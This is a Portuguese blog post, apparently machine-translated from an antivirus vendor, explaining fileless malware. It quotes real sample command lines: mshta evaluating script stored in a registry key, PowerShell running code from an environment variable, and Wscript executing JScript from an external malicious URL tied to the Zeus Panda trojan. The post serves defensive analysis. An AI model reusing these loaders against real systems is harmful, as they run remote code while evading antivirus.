Infecções sem arquivo - o último truque de Ransomware
Se
alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é
apenas o começo. Todos os anos, à medida
que são pagos mais resgates, os cibercriminosos têm mais capital para investir
em novas tecnologias e técnicas. Uma de suas
técnicas mais promissoras é infecções sem arquivo ou ataques de script.
Historicamente,
o malware e agora o ransomware furtivamente um programa em um computador, e
então, abertamente ou secretamente, tentaram a execução desse arquivo. O tópico comum nesses ataques
é que um arquivo é baixado e, em seguida, tenta executar. A arquitetura do software antivírus emprega um driver de
sistema de arquivos. Esse driver trava o arquivo
e depois determina se ele pode ser executado.
Um
malware sem arquivo não descarta um arquivo e ignora o driver do sistema de
arquivos do AV mainstream. Em vez disso, os scripts são escritos e executados através de
conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript.
Mostre e diga a hora.
C: \ WINDOWS \ system32 \
mshta.exe "javascript: QNm90c =" 8YNUG ";
S07R = novo ActiveXObject ("WScript.Shell"); E91eHqEE = "l"; L21MJb = S07R.RegRead ("HKCU \\ software \\ lfxqiypm \\ qkkqsiqrqk"); G0dn1w = "jSJKZ"; Eval (l21MJb); GQEXz2t = "apyD"; " |
O
comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo
Microsoft. O comando chama
Javascipt, que por sua vez chama Wscript para executar um script a partir de
uma chave de registro com caracteres aleatórios. Uma vez que o script reside em uma chave de registro, não há
nenhum arquivo para o driver do sistema de arquivos para analisar.
"C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \
powershell.exe" iex $ env: kuihcdc
|
O
comando acima instrui o Powershell, outro mecanismo de script Microsoft válido,
para executar um script a partir de uma variável de ambiente com caracteres
aleatórios. Uma vez que o script
reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de
arquivos tem visibilidade zero neste tipo de atividade.
Wscript // B // E: JScript OTTYUADAF "gexywoaxor"
"http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP
g5_U_kDbMAl19pucJOw6mF4&es_sm=140&
|
O
comando acima executa o Wscript, outro mecanismo de script Microsoft válido e,
em seguida, muda para o Javascript e executa o script diretamente de um site
com uma seqüência de consulta gnarly. Vamos pensar sobre isso. O
comando acima está instruindo wscript a executar o código diretamente de um site
externo sem um arquivo atingindo o driver do sistema de arquivos.
Se
alguém faz uma pesquisa na estranha string "gexywoaxor", descobre-se
que esse malware é um trojan bancário chamado Zeus Panda descoberto por
Forcepoint.
O
artigo está datado de julho de 2016 e o PC Matic bloqueou a amostra em novembro de 2016, 4
meses depois.
|
Amostra de ponto de força
|
Amostra PC Matic
|
Encontro
|
Julho de 2016
|
Novembro de 2016
|
Mecanismo de script
|
Wscript
|
Wscript
|
Nome do arquivo de script
|
R3ak.tmp
|
OTTYUADAF
|
Chave de criptografia
|
Gexwoaxor
|
Gexwoaxor
|
URL
|
Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh
|
Hit.thincoachmd.com
|
Nesses
quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave
de criptografia crítica "gexywoaxor" permaneceu inalterada. O fato de que uma nova chave
de criptografia não era necessária era um sinal de que este vírus tinha sucesso
na entrega da sua carga útil.
Os
ataques de script ou infecções sem arquivo estão aqui hoje. 25% de todos os blocos de PC
Matic de malware estão no nível de script. De
forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o
lançamento de um arquivo mais tarde para ser executado. Nesse caso, há um segundo ponto em que uma abordagem de placa
de arquivos / lista negra pode capturar e bloquear a intrusão. O problema é que nem todos os ataques de script soltam um
arquivo e isso representa um buraco de segurança no antivírus da sua empresa.
Nenhum comentário:
Postar um comentário